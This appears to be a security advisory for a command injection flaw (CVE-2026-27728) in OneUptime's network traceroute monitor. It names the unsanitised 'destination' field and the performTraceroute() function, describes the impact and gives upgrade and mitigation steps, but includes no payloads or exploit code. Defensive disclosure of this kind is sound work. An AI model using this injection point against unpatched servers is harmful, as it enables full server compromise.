OneUptime Command Injection (CVE-2026-27728)

Overview

A critical security vulnerability has been identified in the OneUptime monitoring platform. This flaw allows authenticated users to execute arbitrary commands on the underlying server hosting a OneUptime Probe, potentially leading to a full system compromise.

Vulnerability Details

In simple terms, this is an OS Command Injection vulnerability. In affected versions of OneUptime, the feature that performs network traceroute checks did not properly validate or sanitize user input. Specifically, an authenticated user could insert special command characters into the “destination” field of a network monitor.

When the system’s performTraceroute() function ran, it would pass this malicious input directly to the server’s operating system shell. The system would then execute not just the intended traceroute command, but any additional commands the attacker injected. This bypasses normal application security controls.

Impact and Risk

The impact of this vulnerability is severe (CVSS Score: 9.9 - CRITICAL). A successful exploit could allow an attacker with standard project user credentials to:

• Gain complete control over the Probe server.
• Install malware, ransomware, or cryptominers.
• Steal sensitive data from the server or connected systems.
• Use the compromised server as a foothold to attack other internal network resources.
• Disrupt monitoring services and hide other malicious activity.

Any organization running an affected, internet-accessible OneUptime instance is at significant risk.

Remediation and Mitigation

Immediate action is required to protect your systems.

Primary Fix: Upgrade The only complete remediation is to upgrade your OneUntime installation to version 10.0.7 or later. This version contains the necessary patches to sanitize user input and prevent command injection. Follow your standard procedures for testing and deploying updates to the OneUptime application.

Temporary Mitigation (If Upgrade is Delayed): If an immediate upgrade is not possible, consider these temporary measures to reduce risk:

1. Restrict Access: Immediately review and minimize the number of users with “Member” or higher permissions in your OneUptime projects. Only essential personnel should have access.
2. Network Segregation: Ensure your OneUptime Probe servers are placed on isolated network segments with strict firewall rules, limiting their ability to communicate with other critical internal systems.
3. Monitor Logs: Closely monitor server and application logs for any unusual command execution or unauthorized access attempts.

Important Note: These are temporary risk-reduction steps and do not eliminate the vulnerability. Upgrading to the patched version is the only definitive solution.